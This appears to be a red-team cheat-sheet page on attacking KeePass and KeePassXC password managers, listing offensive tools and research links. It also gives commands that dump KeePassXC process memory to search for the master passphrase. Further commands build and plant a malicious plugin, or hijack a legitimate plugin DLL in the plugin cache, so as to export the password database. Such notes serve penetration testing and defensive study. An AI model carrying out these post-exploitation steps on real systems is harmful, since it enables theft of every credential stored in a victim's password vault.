Comment on page

KeePass

​https://blog.harmj0y.net/redteaming/a-case-study-in-attacking-keepass/​
​https://blog.harmj0y.net/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/​
​https://habr.com/ru/post/346820/​
KeePassXC
​https://github.com/keepassxreboot/keepassxc​
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item "C:\Program Files\KeePassXC\KeePassXC.exe")).FileVersion
Extract Passphrase from Memory
​https://github.com/d3lb3/KeePass-the-Hash​
PS > .\strings2.exe -pid (Get-Process KeePassXC) -a -wide > keepassxc_strings.txt
PS > gc .\keepassxc_strings.txt | Select-String -Pattern Passw0
PS > (gc .\keepassxc_strings.txt).length
PS > (gc .\keepassxc_strings.txt).length / 1mb
DLL Hijacking
​https://skr1x.github.io/keepass-dll-hijacking/​
Extract Passphrase from Memory (< v2.53.1)
CVE-2023-32784
​https://github.com/vdohney/keepass-password-dumper​
​https://github.com/CMEPW/keepass-dump-masterkey​
​https://www.forensicxlab.com/posts/keepass/​
Abusing KeePass Triggers (< v2.54)
​https://d3lb3.github.io/keepass_triggers_arent_dead/​
​https://gist.github.com/d3lb3/fb6f5d82e47744f56117b350d94a6029​
Tools
KeeFarce
​https://github.com/denandz/KeeFarce​
KeeFarceReborn
​https://github.com/d3lb3/KeeFarceReborn​
Abusing the KeePass Plugin Cache
​https://blog.quarkslab.com/post-exploitation-abusing-the-keepass-plugin-cache.html​
​https://github.com/d3lb3/KeeFarceReborn/tree/main/KeeFarceRebornPlugin​
Export DB by compiling and loading a malicious plugin (requires admin's privileges to place the .plgx file):
Cmd > KeePass.exe --plgx-create C:\KeeFarceReborn\KeeFarceRebornPlugin
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin.plgx "C:\Program Files\KeePass Password Safe 2\Plugins"
Export DB by hijacking a legit plugin DLL (requires an existent plugin in use):
Cmd > copy "C:\Program Files\KeePass Password Safe 2\KeePass.exe" .
Cmd > devenv /build Release KeeFarceRebornPlugin.sln
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin\bin\Release\KeeFarceRebornPlugin.dll C:\Users\snovvcrash\AppData\Local\KeePass\PluginCache\3o7A46QKgc2z6Yz1JH88\LegitPlugin.dll
KeePassHax
​https://github.com/HoLLy-HaCKeR/KeePassHax​
KeeThief
​https://github.com/GhostPack/KeeThief​
CrackMapExec
​https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/modules/keepass_discover.py​
​https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/modules/keepass_trigger.py​
KeePwn
​https://github.com/Orange-Cyberdefense/KeePwn​

Last modified 5mo ago